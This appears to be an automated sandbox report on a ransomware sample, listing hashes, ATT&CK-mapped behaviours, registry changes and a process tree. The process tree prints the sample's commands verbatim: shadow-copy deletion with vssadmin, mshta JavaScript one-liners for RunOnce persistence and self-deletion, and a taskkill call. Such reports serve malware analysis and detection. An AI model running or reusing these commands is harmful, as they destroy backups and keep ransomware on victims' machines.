028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560

General

Target

028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
Size

256KB
MD5

156ed66fb7257ef1bdd6385c71e5aa83
SHA1

2d302323eab61e5791ab5ce2c6728e6708743bed
SHA256

028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560
SHA512

c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4

Score

9^/10

persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 9 IoCs

Processes:

mshta.exe

flow pid process

7 1504 mshta.exe
8 1504 mshta.exe
10 1504 mshta.exe
11 1504 mshta.exe
14 1504 mshta.exe
15 1504 mshta.exe
17 1504 mshta.exe
18 1504 mshta.exe
20 1504 mshta.exe
Executes dropped EXE 1 IoCs

Processes:

trust.exe

pid process

1528 trust.exe

flow	pid	process
7	1504	mshta.exe
8	1504	mshta.exe
10	1504	mshta.exe
11	1504	mshta.exe
14	1504	mshta.exe
15	1504	mshta.exe
17	1504	mshta.exe
18	1504	mshta.exe
20	1504	mshta.exe

pid	process
1528	trust.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

trust.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\ApproveExport.tiff	trust.exe
File opened for modification	C:\Users\Admin\Pictures\WatchConvert.tiff	trust.exe

Deletes itself 1 IoCs

Processes:

mshta.exe

pid process

1420 mshta.exe

pid	process
1420	mshta.exe

Loads dropped DLL 2 IoCs

Processes:

028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe

pid	process
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exetrust.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893} = "C:\\Users\\Admin\\AppData\\Local\\trust.exe"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run	trust.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\How to restore files = "mshta.exe \"C:\\Users\\Admin\\How to restore files.hta\""	trust.exe

Drops desktop.ini file(s) 27 IoCs

Processes:

trust.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Links\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	trust.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-2455352368-1077083310-2879168483-1000\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	trust.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\desktop.ini	trust.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	trust.exe

Maps connected drives based on registry 3 TTPs 4 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

trust.exe028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	trust.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	trust.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1632 vssadmin.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

888 taskkill.exe

pid	process
1632	vssadmin.exe

pid	process
888	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exemshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exetrust.exe

pid	process
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
1528	trust.exe
1528	trust.exe
1528	trust.exe
1528	trust.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

vssvc.exetaskkill.exe

description	pid	process
Token: SeBackupPrivilege	568	vssvc.exe
Token: SeRestorePrivilege	568	vssvc.exe
Token: SeAuditPrivilege	568	vssvc.exe
Token: SeDebugPrivilege	888	taskkill.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exetrust.execmd.exe

description	pid	process	target process
PID 1976 wrote to memory of 1528	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	trust.exe
PID 1976 wrote to memory of 1528	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	trust.exe
PID 1976 wrote to memory of 1528	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	trust.exe
PID 1976 wrote to memory of 1528	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	trust.exe
PID 1976 wrote to memory of 1420	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	mshta.exe
PID 1976 wrote to memory of 1420	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	mshta.exe
PID 1976 wrote to memory of 1420	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	mshta.exe
PID 1976 wrote to memory of 1420	1976	028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe	mshta.exe
PID 1528 wrote to memory of 1520	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1520	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1520	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1520	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1632	1528	trust.exe	vssadmin.exe
PID 1528 wrote to memory of 1632	1528	trust.exe	vssadmin.exe
PID 1528 wrote to memory of 1632	1528	trust.exe	vssadmin.exe
PID 1528 wrote to memory of 1632	1528	trust.exe	vssadmin.exe
PID 1528 wrote to memory of 1504	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1504	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1504	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1504	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1648	1528	trust.exe	cmd.exe
PID 1528 wrote to memory of 1648	1528	trust.exe	cmd.exe
PID 1528 wrote to memory of 1648	1528	trust.exe	cmd.exe
PID 1528 wrote to memory of 1648	1528	trust.exe	cmd.exe
PID 1648 wrote to memory of 888	1648	cmd.exe	taskkill.exe
PID 1648 wrote to memory of 888	1648	cmd.exe	taskkill.exe
PID 1648 wrote to memory of 888	1648	cmd.exe	taskkill.exe
PID 1648 wrote to memory of 888	1648	cmd.exe	taskkill.exe
PID 1528 wrote to memory of 1392	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1392	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1392	1528	trust.exe	mshta.exe
PID 1528 wrote to memory of 1392	1528	trust.exe	mshta.exe

C:\Users\Admin\AppData\Local\Temp\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
"C:\Users\Admin\AppData\Local\Temp\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe"
1⤵
- Loads dropped DLL
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1976

C:\Users\Admin\AppData\Local\trust.exe
"C:\Users\Admin\AppData\Local\trust.exe" runas
2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Adds Run key to start application
- Drops desktop.ini file(s)
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1528

C:\Windows\SysWOW64\mshta.exe
mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893}','C:\\Users\\Admin\\AppData\\Local\\trust.exe');}catch(e){}},10);"
3⤵
- Adds Run key to start application
- Modifies Internet Explorer settings
PID:1520

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:1632

C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\Admin\How to restore files.hta"
3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
PID:1504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C taskkill /PID 1520 /F
3⤵
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\SysWOW64\taskkill.exe
taskkill /PID 1520 /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\Windows\SysWOW64\mshta.exe
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('C:\\Users\\Admin\\AppData\\Local\\trust.exe');close()}catch(e){}},10);"
3⤵
- Modifies Internet Explorer settings
PID:1392

C:\Windows\SysWOW64\mshta.exe
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('C:\\Users\\Admin\\AppData\\Local\\Temp\\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe');close()}catch(e){}},10);"
2⤵
- Deletes itself
- Modifies Internet Explorer settings
PID:1420

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:568

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Modify Registry

3

T1112

Install Root Certificate

1

T1130

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-2455352368-1077083310-2879168483-1000\desktop.ini
MD5
7beb3898ce5d1cade485b17e6c19c710

SHA1
4a8f91f537604d925bb555ba23587cb134dcb592

SHA256
41eaf2f78a78de33c87f839709abf2ead8f410aaa34092650331a02d53960a56

SHA512
3bd91516abcafd121a4eb6bfb9d6171f487634a40081e84d1cdbe63cae73ec2fe0eb7b576731e8a971e2bb517b2ce445b5c9a5f845ff9dd8f65b359fc93e4673

Download Submit
C:\Users\Admin\AppData\Local\trust.exe
MD5
156ed66fb7257ef1bdd6385c71e5aa83

SHA1
2d302323eab61e5791ab5ce2c6728e6708743bed

SHA256
028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560

SHA512
c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4

Download Submit
C:\Users\Admin\AppData\Local\trust.exe
MD5
156ed66fb7257ef1bdd6385c71e5aa83

SHA1
2d302323eab61e5791ab5ce2c6728e6708743bed

SHA256
028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560

SHA512
c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4

Download Submit
C:\Users\Admin\How to restore files.hta
MD5
a7ba624269e3e91090dc922f6b9fdc4e

SHA1
67fd5f2e3ea7113e49e594d1284f673ee19ee651

SHA256
8b029c3740bfdec39297795eb6cedebf13bfa647cd26450b85121bf1b217018f

SHA512
9c25d09b55861bca9b2252e68524112bd1f5e6a7fc4fca1ec0d325640f181d1dd4c7a75bdad4659995c10b3567610130297a52719a9905888ea9142db5e129ea

Download Submit
\Users\Admin\AppData\Local\trust.exe
MD5
156ed66fb7257ef1bdd6385c71e5aa83

SHA1
2d302323eab61e5791ab5ce2c6728e6708743bed

SHA256
028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560

SHA512
c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4

Download Submit
\Users\Admin\AppData\Local\trust.exe
MD5
156ed66fb7257ef1bdd6385c71e5aa83

SHA1
2d302323eab61e5791ab5ce2c6728e6708743bed

SHA256
028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560

SHA512
c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4

Download Submit
memory/888-74-0x0000000000000000-mapping.dmp

Download
memory/1392-75-0x0000000000000000-mapping.dmp

Download
memory/1420-66-0x0000000000000000-mapping.dmp

Download
memory/1504-71-0x0000000000000000-mapping.dmp

Download
memory/1520-68-0x0000000000000000-mapping.dmp

Download
memory/1528-63-0x0000000000000000-mapping.dmp

Download
memory/1632-69-0x0000000000000000-mapping.dmp

Download
memory/1648-73-0x0000000000000000-mapping.dmp

Download
memory/1976-60-0x0000000075DA1000-0x0000000075DA3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads